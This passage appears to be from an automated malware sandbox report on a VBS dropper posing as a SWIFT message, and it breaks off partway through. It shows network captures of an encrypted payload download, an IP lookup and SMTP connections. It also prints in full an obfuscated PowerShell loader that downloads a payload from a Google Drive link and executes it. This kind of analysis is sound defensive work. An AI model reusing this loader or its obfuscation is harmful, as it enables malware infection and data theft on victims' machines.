X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-user-App-ID-Token, X-Earth-user-Computation-Profile, X-Earth-user-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 249920
                                                                                  Last-Modified: Mon, 22 Apr 2024 07:06:33 GMT
                                                                                  Date: Tue, 23 Apr 2024 05:54:02 GMT
                                                                                  Expires: Tue, 23 Apr 2024 05:54:02 GMT
                                                                                  Cache-Control: private, max-age=0
                                                                                  X-Goog-Hash: crc32c=YNs62g==
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close
                                                                                  2024-04-23 05:54:02 UTC4764INData Raw: 55 5e 8a cd 6a 72 0c 0d eb 1a ca b6 90 d3 b6 d3 71 b3 6c 71 91 0d 76 c3 d0 ab 20 6d 68 bf 8e 05 2a 91 85 b8 96 26 24 dd 0a aa 38 b3 b8 6e 88 08 f7 b4 66 d5 c4 2a 82 87 74 53 30 a0 13 80 bb 3d 10 a7 57 e6 de 31 a7 b7 8c 16 e0 2d ff 5e 4e 74 e2 40 d6 92 9e 00 d8 32 45 7e 3a dd e4 0b 4f c4 5d 1d 2d 1f f7 e9 0e 64 40 ec af bd 3d 21 b8 c6 18 2e 92 2d 98 1a 02 58 c0 05 14 f3 26 cf 03 6b 6e a8 41 b1 2b 57 35 b8 63 63 04 91 64 9e 99 93 9d 99 18 ec ee 79 49 26 55 c0 61 28 17 a3 f8 2b f1 b1 bf 4e 64 67 ac cd 27 5a 8d f5 a5 0e ad e5 29 b7 ec 47 c7 3c 31 3c f7 b7 7a a3 0e d3 4b e3 34 89 e6 16 1a 9d 25 06 b6 b6 79 4d 93 c3 fb 87 87 98 8a 65 f5 c9 af e5 c6 98 6e 81 d5 8e 20 c4 60 dd aa 86 ef c4 f0 87 de 17 55 2c 98 24 d4 99 8d c2 71 ab 5d b7 5a 92 95 db 18 ce ce c9 1c
                                                                                  Data Ascii: U^jrqlqv mh*&$8nf*tS0=W1-^Nt@2E~:O]-d@=!.-X&knA+W5ccdyI&Ua(+Ndg'Z)G<1<zK4%yMen `U,$q]Z
                                                                                  2024-04-23 05:54:02 UTC4764INData Raw: b2 cc 22 82 77 85 9d a8 b5 0c fc d7 b8 91 15 d4 3a 4e a9 da 41 fc de f1 ef 54 e6 f6 74 e8 77 94 4f 12 93 86 1c a1 35 c5 2f f1 89 19 4a f2 ec d1 4e d1 db 53 ec bf 6a a7 07 6a 29 33 c7 39 1e 5d 54 44 40 e5 9d d6 22 01 c5 7a ef 5b f2 e9 5c 68 b9 8f fb c9 01 b8 68 f9 db 2a 6a 84 e7 01 26 dc 2b de a1 24 5c 70 7f b2 95 d5 ea f4 45 56 0e 75 cc 04 5c 3d 22 4e 04 0f 4f b4 55 b9 98 08 3c 0f 24 8f ec 09 c5 0c e8 95 2a 69 9f 30 5d c7 ae 1d bd 08 f5 01 0a b7 4f 3b 8f 8e 33 9b a7 bd 10 74 e1 1c b1 ba 9b c4 71 a8 28 2a 53 d5 c9 bd 4d 29 48 62 f9 5e 1d 43 57 e2 ea 25 7a 0b 55 49 30 ad c3 22 f3 a7 68 1e 9c f2 8a 4f 93 49 65 b6 be d9 f1 e4 71 99 f8 8c 78 c2 47 39 e4 b6 aa 65 dd 6b c3 ea 92 a8 4c 4c 71 d2 80 90 3b bc c6 88 3a ed 08 cd 4f f3 ae 3b 78 38 63 b7 d8 20 4a 3d 0e
                                                                                  Data Ascii: "w:NATtwO5/JNSjj)39]TD@"z[\hh*j&+$\pEVu\="NOU<$*i0]O;3tq(*SM)Hb^CW%zUI0"hOIeqxG9ekLLq;:O;x8c J=
                                                                                  2024-04-23 05:54:02 UTC408INData Raw: ec ab 95 00 21 b8 cc 98 0d 92 2d 9c 3a 06 58 c0 05 ea fd a6 cf 03 95 6c b7 fb 9f 2a e3 3c 75 bc da 3c ce a9 bf cd d3 d8 e8 38 9a 1c 12 2e 54 30 8d 43 4b 76 cd 68 4a 85 91 dd d5 48 15 d9 83 00 33 e3 d5 1f 40 c7 d6 44 d8 88 0a c1 33 3c 30 53 b0 7a a3 0a f3 43 e3 64 cc 18 18 56 9c 26 f8 95 73 66 0b 95 c3 fb 87 79 99 b3 76 15 c9 ad 9a c5 99 65 85 ec 81 23 c4 60 f5 ad 86 ef c4 0e 89 30 f2 56 d2 94 04 d4 b9 89 c2 75 ab a3 b6 23 8f 95 fb 18 b0 ed cb 1c 22 3a 7a 53 69 06 5b 78 cf b0 45 f2 4c af 6c 15 05 3d b8 59 c1 d7 9f a0 98 33 dd c4 b2 32 76 88 fc 7d b1 83 42 41 73 17 0b d1 02 df 14 dc e1 34 1c 72 25 77 8e 6c 45 2c 28 5a 19 3d 62 ce 45 34 a5 aa d4 ff 44 65 88 e6 ad aa f7 fd 04 05 ed 0f 05 84 8c 8e 8c cc 83 54 61 c0 12 8e bd ab 60 69 b6 08 f3 a4 17 f2 88 77 07
                                                                                  Data Ascii: !-:Xl*<u<8.T0CKvhJH3@D3<0SzCdV&sfyve#`0Vu#":zSi[xELl=Y32v}BAs4r%wlE,(Z=bE4DeTa`iw
                                                                                  2024-04-23 05:54:02 UTC1255INData Raw: f4 6a 4e 64 b5 e5 84 37 74 1e 50 46 23 6c a0 cd fc 85 d3 26 be 9b 62 3f 4e 69 60 30 36 60 63 d7 df c0 87 9a da fc 7e 1b 36 7f 11 a9 2b ff 66 78 7c 63 1e f0 9a a0 ad fe 96 95 d4 2d 02 cf 0a b2 bc 0a 3d 7b 85 97 08 a1 0c fc d3 34 c2 2f c7 4a 66 e8 a4 4f f6 5e e4 d6 bc e2 84 09 ca 72 e4 67 53 6d 88 16 21 27 3b 23 f5 fb 44 4a f2 9c f9 f1 d0 e2 57 6c ac 6a 8f 0d 18 7b 36 e7 4a 36 1c 54 ba 44 65 89 d6 dc 09 d3 fa da 5e f2 ed 2e c8 bb b6 98 e1 43 b8 1b b9 5b 3c 6c 04 e1 73 78 db 0b a8 89 66 5c 8e 7b 32 82 d5 14 fc 37 32 2d 74 bc 2c 1e c3 23 7d 8a 17 4f b4 79 e0 e7 0a 3a 5f 0e ce ec 09 31 82 f1 95 2a 93 e1 58 5e e7 d8 35 ff 08 0b 0a b3 be 4f 3b 8b 82 63 98 a7 c9 57 7e e1 1c bd 1a 87 c4 71 ac a4 54 50 d5 b9 c3 5d 29 48 46 82 c2 1e 43 d9 63 ce 36 7a 0f 27 d5 30 ad
                                                                                  Data Ascii: jNd7tPF#l&b?Ni`06`c~6+fx|c-={4/JfO^rgSm!';#DJWlj{6J6TDe^.C[<lsxf\{272-t,#}Oy:_1*X^5O;cW~qTP])HFCc6z'0
                                                                                  2024-04-23 05:54:02 UTC66INData Raw: 06 08 00 13 a0 4f 3b 8f 0e 3f 97 a7 b9 81 33 ed 1c 97 ba 9c c4 71 56 d7 1d 45 d5 c9 43 bf 25 40 42 83 0e 1d 43 a3 1d dd 3f 7a 2b 74 37 33 ad 3d 28 90 f1 68 e0 96 de 80 6f 9e 49 9b b8 40 d8 c8 14 7d
                                                                                  Data Ascii: O;?3qVEC%@BC?z+t73=(hoI@}
                                                                                  2024-04-23 05:54:02 UTC1255INData Raw: 99 f8 94 26 c0 47 39 3a b9 93 76 dd 95 cd 95 c7 a8 b2 46 fd d1 a0 86 3f 9c cf 76 3b d4 d6 c3 4f f3 50 c9 70 38 b3 d1 df 20 4b 15 b8 e8 2d 21 62 24 9f 69 90 55 80 31 81 df 6f 87 04 83 a7 49 0a 18 79 35 39 7e 01 82 57 6a b4 9f 48 d2 c2 ab 04 58 2f 5b 10 e9 35 af 86 9e dd a5 a6 90 98 40 36 f4 45 f2 3b 4f e7 cc 8a 59 48 c6 02 5d e1 21 a6 e1 81 40 07 19 37 77 11 50 10 97 2f f4 45 8b 4b ff 37 c1 59 7d 00 0d cf 02 0c 5d d7 92 8a 04 3e 27 95 0e ff 94 df 99 a3 56 16 d0 49 f2 b1 82 b5 26 1a 24 ef d4 14 e0 5e 99 ba 94 4c f9 2e d0 4b 87 c8 7a 4e a1 98 11 64 a2 18 b8 a9 92 d5 64 aa ac 0b 78 65 2a a8 c5 db 21 9e c3 f0 64 b5 5a da aa 60 36 4c 55 ba 8b 73 f9 29 2f aa bb c0 ec 2b 2c bb c3 1a 45 83 1d 21 f4 e7 c7 ac 4f 9d ed 33 88 be ea 22 72 e9 10 5b 7d 0a 7b 73 76 0a 9d
                                                                                  Data Ascii: &G9:vF?v;OPp8 K-!b$iU1oIy59~WjHX/[5@6E;OYH]!@7wP/EK7Y}]>'VI&$^L.KzNddxe*!dZ`6LUs)/+,E!O3"r[}{sv
                                                                                  2024-04-23 05:54:02 UTC1255INData Raw: a7 5a 38 6c 55 ba b3 f1 06 28 16 80 a4 c0 ec 2b f2 b4 cf 1a 45 83 1f 2e f4 c7 2b a0 4c 9d 33 34 b1 a5 ea dc 73 2e 19 5f 7d 22 0f 76 76 00 11 06 8c 81 26 4a 01 d6 08 a9 f3 d2 3a c0 e4 f2 fd 65 dc ca 07 14 58 52 98 7a 12 10 63 65 7a 4a c8 bb 0d 15 4d 2b 21 69 1e b6 c4 d8 0c c4 84 cd b5 e0 cc 70 ff 7e d9 98 f1 af 8e 62 72 12 cb 62 a2 1a 22 dc 7e 15 5f 03 c9 e4 dd 11 a3 b7 88 16 1e 23 03 a1 4e 8a 56 43 d6 b2 9c 00 d8 32 fb 7f 03 cc e4 0b 4f 3a 51 1d 2d e1 f9 e8 0e 44 43 ec af bd c3 2f bb c6 18 d0 9e 2e 98 3a 03 58 c0 05 ea f2 9f d9 03 6b 60 49 f2 bf 2b 98 5f 75 42 df fb d3 a9 bf ed f9 f4 ea 38 62 92 15 2e 54 ca a1 42 4b 56 c8 96 44 85 6f dc 12 52 15 d9 a3 f9 3f e3 d5 1f 4d ff c5 04 72 77 dd 16 11 3a 36 d3 b7 84 ad 0d d3 4b 1d 68 cf e6 36 52 9c 26 06 67 72 5f
                                                                                  Data Ascii: Z8lU(+E.+L34s._}"vv&J:eXRzcezJM+!ip~brb"~_#NVC2O:Q-DC/.:Xk`I+_uB8b.TBKVDoR?Mrw:6Kh6R&gr_
                                                                                  2024-04-23 05:54:02 UTC1255INData Raw: 11 cd 96 40 ea ac dd 2b 42 35 d5 a3 07 33 1d db e2 41 fe 3b 48 db 88 02 ea 31 3c 36 2d b6 43 93 0e d3 4b 1d 68 ce e6 36 56 9d 26 06 c0 36 60 2b 93 c3 7b 78 78 67 51 9b ea 36 16 e4 cd 99 de 81 d5 48 a3 3b 9f 2a 71 78 10 3b d0 83 30 f2 56 d2 96 07 d4 99 73 ce 76 ab 7d b3 1a 92 95 05 19 f7 c0 cb 1c 26 7c c0 53 69 02 53 40 cf b0 4f 8c 60 ac 6c 11 db 34 bb 59 e1 2f 91 a0 98 cd 22 f1 97 32 56 8d 02 74 b2 7d 93 6d 51 17 09 f9 62 e5 14 d6 c3 0f 47 70 2f a2 b3 57 45 2e dc 7c 27 3d 42 c3 c5 31 a5 54 de dc 42 65 76 ea 50 a4 d7 ff 04 fb e1 f1 04 9d 98 8e 8c cc 83 5f 5a d8 3a d2 bd 83 55 97 b8 00 9c c4 14 f2 82 f7 ff f7 11 a7 32 2d ec f7 7f 29 7e 88 4c f8 36 3b 4e ea db 6a b4 66 67 ac be b0 1e 1e f1 2d b8 fa 58 45 88 cb 86 a9 6c 2c a8 85 60 a3 0b ce b0 b2 db 0d a0 22
                                                                                  Data Ascii: @+B53A;H1<6-CKh6V&6`+{xxgQ6H;*qx;0Vsv}&|SiS@O`l4Y/"2Vt}mQbGp/WE.|'=B1TBevP_Z:U2-)~L6;Njfg-XEl,`"
                                                                                  2024-04-23 05:54:02 UTC1255INData Raw: d3 e0 d4 7e 09 7e 88 b2 f6 c8 3a 77 1e d7 6a b4 46 43 ad be b0 e0 e1 c6 2b b8 fa a6 71 8e cb a6 a5 54 7e 57 84 9e b0 0e ce b0 a1 d3 0a a0 9f 1a 5c bf a2 59 3b cc b4 de ce fc 35 bd 56 a8 90 52 24 97 30 a4 4c c5 c2 6c fa 13 eb 5f 5b 3f 99 a7 64 11 76 c5 a8 db 1b ed ea d4 0d 2a 01 fa c6 a8 fa f0 e1 f7 0b a9 e2 3c 71 37 1f b0 ef c8 ec 8c df 55 0c 68 7b 67 e8 19 78 89 51 d1 8c 07 ad c4 7b 93 02 ed 48 2e 21 dc 82 f0 3b d4 07 36 93 21 5d 84 a6 28 f9 0d 66 4e 66 e7 54 86 37 04 60 5a 7f 34 68 b7 4d 0e 8c d3 22 ec e0 60 3f 3e c1 28 30 36 62 31 a9 dd c0 f7 4c 95 fc 7e 11 48 7d 11 a9 0f 8d 1b 7a 7c ed 37 88 90 a0 a7 7e 99 b5 d5 29 70 b2 f6 bc cc 22 7c 85 89 9d 88 91 08 fc d7 46 6e 2d fe 3f 4e a9 a4 77 f9 de f5 d6 84 b4 09 8b 37 58 94 4f 12 76 b8 1e a1 d5 3b 23 f1 87
                                                                                  Data Ascii: ~~:wjFC+qT~W\Y;5VR$0Ll_[?dv*<q7Uh{gxQ{H.!;6!](fNfT7`Z4hM"`?>(06b1L~H}z|7~)p"|Fn-?Nw7XOv;#
                                                                                  2024-04-23 05:54:02 UTC1255INData Raw: 01 6f b2 08 b8 b1 5b 7c 7b 81 bd 8e b1 0c fc 29 48 92 2c c7 c4 42 ab a4 6f fb de f5 d6 42 e7 cf 6f c8 72 94 b1 1b 6d 88 e2 a8 35 3b 58 87 89 39 4c 8f 95 d1 b0 d4 c2 55 ec bf 6a 71 07 68 29 35 19 36 1c 5d 74 be 4e e5 9d 28 dd 34 e7 7a cf 5e 0c e0 5c 96 9d cd 9c c9 01 bc 69 00 db 2a 1c 2c fe 01 26 d2 76 ac a1 24 58 ae 74 b2 95 d5 ea f6 47 56 2e 8a c0 06 5c e3 23 77 0a 0f b1 b5 44 98 9a 08 3a 2f 06 8e ec 09 3b fc e6 97 2a 97 6d 3c 5f e7 88 15 bd 08 0b fe 32 9d 4a 3b 8f f0 09 9e a7 b9 7f 07 00 e1 48 65 b6 c4 71 ab e6 20 53 72 db 43 41 28 48 42 e1 7e 1d 43 a9 e3 2d 38 7a 0b 6d a4 21 ad c3 26 62 fd 68 1e ba b5 80 4f 93 b7 9a 81 b4 d9 f1 1a 57 b9 90 ac 70 c2 b9 37 1a b7 93 88 d1 6b c3 b9 91 a8 4c 4a 0f d0 b9 9a 3f 9c cf a2 1a ba f6 c3 4f 0d a0 c5 74 38 9d 9b df
                                                                                  Data Ascii: o[|{)H,BoBorm5;X9LUjqh)56]tN(4z^\i*,&v$XtGV.\#wD:/;*m<_2J;Heq SrCA(HB~C-8zm!&bhOWp7kLJ?Ot8


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.649725172.67.74.1524435808C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-23 05:54:05 UTC155OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                  Host: api.ipify.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-04-23 05:54:05 UTC211INHTTP/1.1 200 OK
                                                                                  Date: Tue, 23 Apr 2024 05:54:05 GMT
                                                                                  Content-Type: text/plain
                                                                                  Content-Length: 14
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 878b98d2adce0f36-EWR
                                                                                  2024-04-23 05:54:05 UTC14INData Raw: 31 35 34 2e 31 36 2e 31 39 32 2e 31 36 33
                                                                                  Data Ascii: 154.16.192.163


                                                                                  SMTP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                  Apr 23, 2024 07:54:07.950046062 CEST5874972666.29.159.53192.168.2.6220 PrivateEmail.com prod Mail Node
                                                                                  Apr 23, 2024 07:54:07.950285912 CEST49726587192.168.2.666.29.159.53EHLO 724536
                                                                                  Apr 23, 2024 07:54:08.097856045 CEST5874972666.29.159.53192.168.2.6250-mta-06.privateemail.com
                                                                                  250-PIPELINING
                                                                                  250-SIZE 81788928
                                                                                  250-ETRN
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-ENHANCEDSTATUSCODES
                                                                                  250-8BITMIME
                                                                                  250-CHUNKING
                                                                                  250 STARTTLS
                                                                                  Apr 23, 2024 07:54:08.098038912 CEST49726587192.168.2.666.29.159.53STARTTLS
                                                                                  Apr 23, 2024 07:54:08.245395899 CEST5874972666.29.159.53192.168.2.6220 Ready to start TLS
                                                                                  Apr 23, 2024 07:54:11.297290087 CEST5874972766.29.159.53192.168.2.6220 PrivateEmail.com prod Mail Node
                                                                                  Apr 23, 2024 07:54:11.297785044 CEST49727587192.168.2.666.29.159.53EHLO 724536
                                                                                  Apr 23, 2024 07:54:11.446373940 CEST5874972766.29.159.53192.168.2.6250-mta-06.privateemail.com
                                                                                  250-PIPELINING
                                                                                  250-SIZE 81788928
                                                                                  250-ETRN
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-ENHANCEDSTATUSCODES
                                                                                  250-8BITMIME
                                                                                  250-CHUNKING
                                                                                  250 STARTTLS
                                                                                  Apr 23, 2024 07:54:11.446629047 CEST49727587192.168.2.666.29.159.53STARTTLS
                                                                                  Apr 23, 2024 07:54:11.594088078 CEST5874972766.29.159.53192.168.2.6220 Ready to start TLS

                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:07:53:24
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs"
                                                                                  Imagebase:0x7ff744ff0000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:07:53:24
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$naboiO,onprvQuenteB,llerRedfirDrouge ChamaHjem c redhNedlg1Tvist6Physo1Hespe)Taleg ');Multikunsts (Phenolsulphonate 'Multi$ BogpgMahoglForudounsolbYmpnia,angblSynta:ernriT ,esueAddergfy kllAn ipvA bitrLamelkNummesHeatea.agterNum.rbButyreOverfjCurvid ImmueInimisUnidi=C ris$HomosU ForhnC ondb LivsaU.nacpGnis t Vil,iSm.llsEklateunbra.Cu sosSquilpUdflylDrowniOppilthypoc(Vider$k.nceP Der,oHalfll Do ee LarymTr thi Fde.sectroeLand,rFondsef,sibsFabri)Diskk ');$Unbaptise=$Teglvrksarbejdes[0];Multikunsts (Phenolsulphonate 'Bruge$Reg,lgD.ouglIllegoqueneb mustaSo.welUni,t:blankH OrgavAccule StetdSiddeeSti umGavageIntimlBloms= seneNMag.seArbejwKo ce-SplitOApostb.aratjNonnae ayercInfo tDudel A,tomSFerieyBrus s ,asttM,croe ektm K,rs.DomstN LovpeGur dtRentr.FodboWStrope abonb SmilC,utoklNecroiDe oreH,mannFjerptsamme ');Multikunsts (Phenolsulphonate 'Emp.t$ PrimHImpervInfleeSkaerdUhv seFactumKi gheGrns.lBenyt.T iolHpr.deeNybega Selvd Impoe Sjo.rAntissCo se[ Disk$Rigi.DAren.i affegIridotWor he,eutrr NyheiScutisWorkwkRingleElect]Rando=Tempe$Nit,hHun,inyDimpsdMarihrBottooNytthrChr shS,akki addezstaalaFrste ');$Trichomatosis=Phenolsulphonate ' RadiHInstrvDemulePreexdTolueeFe lvmUnra.ePrimalUdsen.C.untD Tw,noMuddyw ovanSiam.lPertioFlydeastrmkdT.abeFPictuiPatrolLan.beBetyd(Tandp$PlougUFerlinOpbygb OssiaRallypUdtr.t GiviiFlabesUndepe Pist,Dyrep$ReforSLoftekVin srkmperd dr.wdor alePeskyr apo.eTraadrFilteeArresnSans,dEnrinet,anssCardi) Fi,k ';$Trichomatosis=$funktionstegningens[1]+$Trichomatosis;$Skrddererendes=$funktionstegningens[0];Multikunsts (Phenolsulphonate ' Klud$ProdugSmeltlReovioEpanobUnpreaToteml rum: ugenhElocuefotogl D spi fteu M,utmVurdeeBurthtBladds D kn= Leje( urisTHeelle.etrasKontitD.tin-Fort,PPreveaherret Dellh,rger A ros$RefleSPlastkovinerDiverdrumbud DowcePretrrBev deS ammrFor.ue forknKristdRegleeKommusDupsk)omstn ');while (!$heliumets) {Multikunsts (Phenolsulphonate 'Vager$Anbrig .ewilBilraoOrmazb lukaAllerl .ndi:KetupE demonlitzdvVanadeDyr hjKabins D agkTrenco HellmRech.mHa esu,eedinBjergi Uni,kSupera rypttSol niFlaado,igmenVedheeHyfeunO inesHager=Disen$EksamtG.melr Sekvusign.e pneu ') ;Multikunsts $Trichomatosis;Multikunsts (Phenolsulphonate 'MiscoSPoroct S.ssaLophorflyvetCalyc-PrescS P.eslBeslue.kelleProvspProvi Spal.4Hv.sk ');Multikunsts (Phenolsulphonate 'Syne.$premogN.taal uttoo TrimbKnobuaProfel Kryd:HmosthNonpeeSeatwlIken,iH ldbuStyptmOut.leL kertOvertsUnch.= Disl(TrombTSpr neZoothsCoop t.enna-FrustPPrustaSo rctFiksehVrigh Radio$ArendSBin,mkTrff rhumhudBoatsdFingee,orskrHost,eReadirFors,ePlatonTor,tdUnfureBathys Japo)Strep ') ;Multikunsts (Phenolsulphonate 'Frema$DiphegAge dlJustioIsophbGenina SniplMassa: Lo,aI epefnBroadtTer.orjonosaChromnEffers TrypiPinkitKompei wa.nvboot.ebromilOpslay Fesc=Arnfr$TraskgStranl lesio Han,bAttesa Lua lDogtr:ForbrF.avnea bad.sEpicetPetarlNucleg unstg,irmaehellelKolonsThiopeGlubhrM.ttenLi laeJubbesSladr+excus+ So,s%Stenc$UnburTThickeKrig gScavelB ssevAgterrOsprekP.antsV rieaI oburUnsupbAnodieTan,sj .imed Omste Rek,sKirke.LagtecLoxodoLeptiuAdvecn Acyltre,ol ') ;$Unbaptise=$Teglvrksarbejdes[$Intransitively];}Multikunsts (Phenolsulphonate 'Boot.$ ArkigAnalylClamaoPetrob DragaattaclRegen:KonjuRGadekePresie S.olvundubiTongmdBra.ceS.cernLjertc demoeFilmk .bre= Spo, kerygG ha.ieFrosttWilli-KopisC Systo NonenPrfertKorpueThrean log,tLacew Sper.$ ArgySDe.takov.rprSkjoldPounddKa ege rapr FyreeKon.rrTo deeDuodrnBl dgdMotioeDelins Snug ');Multikunsts (Phenolsulphonate 'Coppe$.illeg ShamlS.ampo.sksnbM skiaFu igldefen:Tr,inACowpadHoc,er,tovteTillgnMyoloaUnautl,ampeeLydincBalant.topfo CentmOu ruyOvert Spumo=Marke Null[Srg dSFabuly noggsUdefrtDromeePr,apmUnfra.ScreeCSl,beoAlantnA canvUfremeMus.irReacktCandy]Areol:Vanro:de.ilFSkovmrFrodio,roatmUv.nnBPern.a B,ozsSubeleInter6 krmm4.eviaSPos,mtp.etirKnlfti,ertin M tagT lla( B mb$ MonoRAdganeEditaeAftrrvUnproiIndgidIntereeksponUn.ercTapwoeNeo o)Arun, ');Multikunsts (Phenolsulphonate ' Opdi$RattogSme,glhidsio Ldreb Sp daForcel Arbo:dualiD RebeyOestrrS traeLandbpH,anda.nthrrNeo,hkNatioeAurelnSky,d Neu.=Fa,at Infer[AngelSSuperyUnpursCropptHumpleVi.kemautoi.AutocTHorseeKontox BundtAf ek.SpyttESvmmenMyriccDeu,eoDybdedCho.di Wiren kavag Vitt]athir:Regns: offeALuannSEncykCUlt.aIsequeICoxit.Kit.yGSpoereNr.sttN.neqSAfluktFl.ntrCleidi CiganPu itg kreo(Quill$Ekse Aknibtd ElekrAlisoePosttnRekreaTranslIndkoeUdskac FjodtPlan,oC lqum Mo ayVelvi)Skrat ');Multikunsts (Phenolsulphonate 